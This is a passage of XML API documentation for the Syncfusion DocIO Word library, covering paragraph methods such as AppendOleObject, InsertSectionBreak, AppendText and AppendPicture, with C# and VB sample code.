                paragraph = TryCast(section.AddParagraph(), WParagraph)
                'Get the collection of bookmark start in the word document
                Dim items As List(Of Entity) = document.GetCrossReferenceItems(ReferenceType.Bookmark)
                paragraph.AppendText("Bookmark Cross Reference starts here ")
                'Append the cross reference for bookmark �Title� with ContentText as reference kind
                paragraph.AppendCrossReference(ReferenceType.Bookmark, ReferenceKind.ContentText, items(0), True, False, False, String.Empty)
                'Update the document Fields
                document.UpdateDocumentFields()
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendOleObject(System.IO.Stream,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Appends the OLE object to the paragraph with the specified stream, picture and object type.
            </summary>
            <param name="oleStream">The <see cref="T:System.IO.Stream"/> represents the file stream.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.OleObjectType"/> member that specifies the type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Open the file to be embedded
                FileStream stream = new FileStream("Book1.xlsx", FileMode.Open);
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Append the Ole object to the paragraph
                WOleObject ole = paragraph.AppendOleObject(stream, picture, OleObjectType.ExcelWorksheet);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Open the file to be embedded
                Dim stream As New FileStream("Book1.xlsx", FileMode.Open)
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Append the Ole object to the paragraph
                Dim ole As WOleObject = paragraph.AppendOleObject(stream, picture, OleObjectType.ExcelWorksheet)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendOleObject(System.Byte[],Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Appends the OLE object to the paragraph with the specified byte array, picture and object type.
            </summary>
            <param name="oleBytes">The <b>byte</b> array of the file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.OleObjectType"/> member that specifies the type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Get the file as byte array
                byte[] olebytes = File.ReadAllBytes("Excel_Template.xlsx");
                paragraph = sec.AddParagraph();
                //Append OLE object
                paragraph.AppendOleObject(olebytes, picture, OleObjectType.ExcelWorksheet);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Word2010);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Get the file as byte array
                Dim olebytes As Byte() = File.ReadAllBytes("Excel_Template.xlsx")
                paragraph = sec.AddParagraph()
                'Append OLE object
                paragraph.AppendOleObject(olebytes, picture, OleObjectType.ExcelWorksheet)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Word2010)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendOleObject(System.IO.Stream,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleLinkType)">
            <summary>
            Appends the OLE object to the paragraph with the specified stream, picture and file link type.
            </summary>
            <param name="oleStream">The <see cref="T:System.IO.Stream"/> represents the file stream.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="oleLinkType">The <see cref="T:Syncfusion.DocIO.DLS.OleLinkType"/> member that specifies the link type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <remarks>The OLE object type must be explicitly specified when appending OLE objects using this method.</remarks> 
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                FileStream stream = new FileStream("Excel_Template.xlsx", FileMode.Open);
                WOleObject ole = paragraph.AppendOleObject(stream, picture, OleLinkType.Embed);
                ole.ObjectType = "Excel Worksheet";
                //Save the Word document
                document.Save("Sample.docx", FormatType.Word2010);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                Dim stream As New FileStream("Excel_Template.xlsx", FileMode.Open)
                Dim ole As WOleObject = paragraph.AppendOleObject(stream, picture, OleLinkType.Embed)
                ole.ObjectType = "Excel Worksheet"
                'Save the Word document
                document.Save("Sample.docx", FormatType.Word2010)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendOleObject(System.Byte[],Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleLinkType)">
            <summary>
            Appends the OLE object to the paragraph with the specified byte array of the file, picture and link type.
            </summary>
            <param name="oleBytes">The <b>byte</b> array of the file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="oleLinkType">The <see cref="T:Syncfusion.DocIO.DLS.OleLinkType"/> member that specifies the link type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <remarks>The OLE object type must be explicitly specified when appending OLE objects using this method.</remarks>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Get the file as byte array
                byte[] olebytes = File.ReadAllBytes("Excel_Template.xlsx");
                WOleObject ole = paragraph.AppendOleObject(olebytes, picture, OleLinkType.Embed);
                ole.ObjectType = "Excel Worksheet";
                //Save the Word document
                document.Save("Sample.docx", FormatType.Word2010);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Get the file as byte array
                Dim olebytes As Byte() = File.ReadAllBytes("Excel_Template.xlsx")
                Dim ole As WOleObject = paragraph.AppendOleObject(olebytes, picture, OleLinkType.Embed)
                ole.ObjectType = "Excel Worksheet"
                'Save the Word document
                document.Save("Sample.docx", FormatType.Word2010)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendOleObject(System.Byte[],Syncfusion.DocIO.DLS.WPicture,System.String)">
            <summary>
            Appends the OLE object to the paragraph with the specified byte array of the file, picture and file extension.
            </summary>
            <param name="oleBytes">The <b>byte</b> array of the file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="fileExtension">The <b>string</b> that specifies the file extension.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Get the file as byte array
                byte[] olebytes = File.ReadAllBytes("Excel_Template.xlsx");
                paragraph = sec.AddParagraph();
                //Append OLE object
                paragraph.AppendOleObject(olebytes, picture, ".xlsx");
                //Save the Word document
                document.Save("Sample.docx", FormatType.Word2010);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Get the file as byte array
                Dim olebytes As Byte() = File.ReadAllBytes("Excel_Template.xlsx")
                paragraph = sec.AddParagraph()
                'Append OLE object
                paragraph.AppendOleObject(olebytes, picture, ".xlsx")
                'Save the Word document
                document.Save("Sample.docx", FormatType.Word2010)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendOleObject(System.IO.Stream,Syncfusion.DocIO.DLS.WPicture,System.String)">
            <summary>
            Appends the OLE object to the paragraph with the specified file stream, picture and file extension.
            </summary>
            <param name="oleStream">The <see cref="T:System.IO.Stream"/> represents the file stream.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="fileExtension">The <b>string</b> that specifies the file extension.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <example>The following example illustrates how to append OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Open the file to be embedded
                FileStream stream = new FileStream("Excel_Template.xlsx", FileMode.Open);
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Append the Ole object to the paragraph
                WOleObject ole = paragraph.AppendOleObject(stream, picture, "xlsx");
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Open the file to be embedded
                Dim stream As New FileStream("Excel_Template.xlsx", FileMode.Open)
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Append the Ole object to the paragraph
                Dim ole As WOleObject = paragraph.AppendOleObject(stream, picture, "xlsx")
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendOleObject(System.String,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.OleObjectType)">
            <summary>
            Appends the OLE object to the paragraph with the specified path, picture and object type.
            </summary>
            <param name="pathToFile">The <b>string</b> specifying the path to file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.OleObjectType"/> member that specifies the type of OLE object.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example>The following example illustrates how to append a OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                paragraph = sec.AddParagraph();
                paragraph.AppendOleObject(@"..\..\Data\Excel_Template.xlsx", picture, OleObjectType.ExcelWorksheet);
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                paragraph = sec.AddParagraph()
                paragraph.AppendOleObject("..\..\Data\Excel_Template.xlsx", picture, OleObjectType.ExcelWorksheet)
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendOleObject(System.String,Syncfusion.DocIO.DLS.WPicture)">
            <summary>
            Appends the OLE object to the paragraph with the specified path and picture.
            </summary>
            <param name="pathToFile">The <b>string</b> specifying the path to file.</param>
            <param name="olePicture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture"/> instance for the OLE picture.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WOleObject"/> instance that represents the newly created OLE object.</returns>
            <remarks>This method is not supported in Silverlight, WinRT, Windows Phone, Universal, Universal Windows Platform and Xamarin applications.</remarks>
            <example>The following example illustrates how to append a OLE object to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add section to the document
                IWSection sec = document.AddSection();
                //Add paragraph to the section
                IWParagraph paragraph = sec.AddParagraph();
                //Load the picture instance with the image need to be displayed
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                WOleObject ole = paragraph.AppendOleObject(@"..\..\Data\Excel_Template.xlsx", picture);
                //Set how to display the Ole object
                ole.DisplayAsIcon = false;
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add section to the document
                Dim sec As IWSection = document.AddSection()
                'Add paragraph to the section
                Dim paragraph As IWParagraph = sec.AddParagraph()
                'Load the picture instance with the image need to be displayed
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                Dim ole As WOleObject = paragraph.AppendOleObject("..\..\Data\Excel_Template.xlsx", picture)
                'Set how to display the Ole object
                ole.DisplayAsIcon = False
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.InsertSectionBreak">
            <summary>
            Inserts a section break. Creates new section with the break type new page.
            </summary>
            <returns>A reference to the newly created section.</returns>
            <example>
            <para>The following code example illustrates how to insert a section break.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                document.EnsureMinimal();
                //Add text to the first section
                document.LastParagraph.AppendText("First section");
                //Insert section break
                WSection newsection = document.LastParagraph.InsertSectionBreak();
                //Add new paragraph to the second section
                IWParagraph paragraph = newsection.AddParagraph();
                paragraph.AppendText("Second section");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                document.EnsureMinimal()
                'Add text to the first section
                document.LastParagraph.AppendText("First section")
                'Insert section break
                Dim newsection As WSection = document.LastParagraph.InsertSectionBreak()
                'Add new paragraph to the second section
                Dim paragraph As IWParagraph = newsection.AddParagraph()
                paragraph.AppendText("Second section")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.InsertSectionBreak(Syncfusion.DocIO.DLS.SectionBreakCode)">
            <summary>
            Inserts the section break. Creates new section with the specified break type.
            </summary>
            <param name="breakType">The <see cref="T:Syncfusion.DocIO.DLS.SectionBreakCode"/> member that specifies the break type.</param>
            <returns>A reference to the newly created section.</returns>
            <example>
            <para>The following code example illustrates how to insert a section break.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                document.EnsureMinimal();
                //Add text to the first section
                document.LastParagraph.AppendText("First section");
                //Insert section break
                WSection newsection = document.LastParagraph.InsertSectionBreak(SectionBreakCode.Oddpage);
                //Add new paragraph to the second section
                IWParagraph paragraph = newsection.AddParagraph();
                paragraph.AppendText("Second section");
                //Save and close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                document.EnsureMinimal()
                'Add text to the first section
                document.LastParagraph.AppendText("First section")
                'Insert section break
                Dim newsection As WSection = document.LastParagraph.InsertSectionBreak(SectionBreakCode.Oddpage)
                'Add new paragraph to the second section
                Dim paragraph As IWParagraph = newsection.AddParagraph()
                paragraph.AppendText("Second section")
                'Save and close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.StyleName">
            <summary>
            Gets the name of the style applied to the current paragraph. Read-only.
            </summary>
            <value>The <b>string</b> that represents the style name.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.Text">
            <summary>
            Gets or sets text of the paragraph.
            </summary>
            <value>The <b>string </b>that represents the text.</value>
            <remarks>All the internal formatting will be cleared when new text is set.</remarks>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.Item(System.Int32)">
            <summary>
            Gets the paragraph item at the specified index. Read-only.
            </summary>
            <param name="index">The zero-based index of the item to get from the collection.</param>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> at the specified index.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.Items">
            <summary>
            Gets the paragraph format of the current paragraph. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraphFormat"/> of the paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.ParagraphFormat">
            <summary>
            Gets the paragraph format.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.ListFormat">
            <summary>
            Gets the format for the list in the paragraph. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WListFormat"/> of the list in the paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.BreakCharacterFormat">
            <summary>
            Gets the character format for the break symbol. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WCharacterFormat"/> of the paragraph.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.IsInCell">
            <summary>
            Gets a value indicating whether the current paragraph is in cell. Read-only.
            </summary>
            <value><b>True</b> if this paragraph is in cell; otherwise, <b>false</b>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.IsEndOfSection">
            <summary>
            Gets a value indicating whether the current paragraph is end of the section. Read-only.
            </summary>
            <value><b>True</b> if this paragraph is end of section; otherwise <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IWParagraph.IsEndOfDocument">
            <summary>
            Gets a value indicating whether the current paragraph is end of document. Read-only.
            </summary>
            <value><b>True</b> if this paragraph is end of document; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.DEF_NORMAL_STYLE">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.m_style">
            <summary>
            Member that represents the paragraph style.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.m_strTextBuilder">
            <summary>
            The paragraph text
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.m_prFormat">
            <summary>
            Member that represents the paragraph format.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.m_listFormat">
            <summary>
            Member that represents the list format.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.m_pItemColl">
            <summary>
            Member that represents the collection of paragraph items.
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.m_pEmptyItemColl">
            <summary>
            The paragraph items with one empty item.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.m_charFormat">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WParagraph.m_ownerTextBodyItem">
            <summary>
            Specifies the owner textbody item.
            Denotes the owner table, if the current body item is in table cell.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsNeedToAddEmptyTextRangeForBreakItem(Syncfusion.DocIO.DLS.Break)">
            <summary>
            Determines whether the empty text range is need to added or not for break item. 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.IsContainFloatingItems">
            <summary>
            Determine whether the paragraph contains floating items alone
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.#ctor(Syncfusion.DocIO.DLS.IWordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> class with the specified 
            <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.IWordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.MoveParagraphItems(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Move the paragraph items to another paragraph.
            </summary>
            <param name="targetParagraph"></param>
            <param name="sourceParagraph"></param>
            <param name="index"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.SplitTextRange">
            <summary>
            Splits the textrange into new paragraphs if new line character exsists in the text 
            </summary>
            <param name="text"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.InsertBreak(Syncfusion.DocIO.DLS.BreakType)">
            <summary>
            Insert the page/column break after formattings.
            </summary>
            <param name="paragraph"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ApplyStyle(System.String)">
            <summary>
            Applies the style with the specified name to the paragraph.
            </summary>
            <param name="styleName">The <b>string</b> that represents the style name.</param>
            <remarks>The specified style must exists in <see cref="P:Syncfusion.DocIO.DLS.WordDocument.Styles"/> collection.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.ApplyStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Applies the specified built-in style to the paragraph.
            </summary>
            <param name="builtinStyle">The <see cref="T:Syncfusion.DocIO.DLS.BuiltinStyle"/> member that specifies the style.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.EnsureNextStyle(Syncfusion.DocIO.DLS.Style)">
            <summary>
            Ensure Next style
            </summary>
            <param name="style"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.GetStyle">
            <summary>
            Returns the <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/> applied to the paragraph.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/> of the current paragraph.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.RemoveAbsPosition">
            <summary>
            Removes the absolute position data, if paragraph has absolute position in the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendText(System.String)">
            <summary>
            Appends the specified text to the end of the paragraph.
            </summary>
            <param name="text">The <b>string</b> that specifies the text to be appended.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWTextRange"/> instance that represents the newly added text.</returns>
            <example>The following example illustrates how to append text to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                //Add new text to the paragraph
                IWTextRange text = paragraph.AppendText("A new text is added to the paragraph.");
                text.CharacterFormat.FontSize = 14;
                text.CharacterFormat.Bold = true;
                text.CharacterFormat.TextColor = Color.Green;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add new text to the paragraph
                Dim text As IWTextRange = paragraph.AppendText("A new text is added to the paragraph.")
                text.CharacterFormat.FontSize = 14
                text.CharacterFormat.Bold = True
                text.CharacterFormat.TextColor = Color.Green
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WParagraph.AppendPicture(System.Byte[])">
            <summary>
            Appends the image specified by the <see cref="T:System.Byte"/> array to the end of paragraph.
            </summary>
            <param name="imageBytes">The <see cref="T:System.Byte"/> array of the image to be added.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWPicture"/> instance that represents the newly added image.</returns>
            <example>The following example illustrates how to append image to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph firstParagraph = section.AddParagraph();
                //Get the image and convert to byte array.
                Image image = Image.FromFile("Image.png");
                MemoryStream stream = new MemoryStream();
                image.Save(stream, System.Drawing.Imaging.ImageFormat.Png);
                byte[] imageBytes = stream.ToArray();
                //Add image to the paragraph
                IWPicture picture = firstParagraph.AppendPicture(imageBytes);
                //Set height and width for the image
                picture.Height = 100;
                picture.Width = 100;
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim firstParagraph As IWParagraph = section.AddParagraph()
                'Get the image and convert to byte array.
                Dim image__1 As Image = Image.FromFile("Image.png")
                Dim stream As New MemoryStream()
                image__1.Save(stream, System.Drawing.Imaging.ImageFormat.Png)
                Dim imageBytes As Byte() = stream.ToArray()
                'Add image to the paragraph
                Dim picture As IWPicture = firstParagraph.AppendPicture(imageBytes)
                'Set height and width for the image
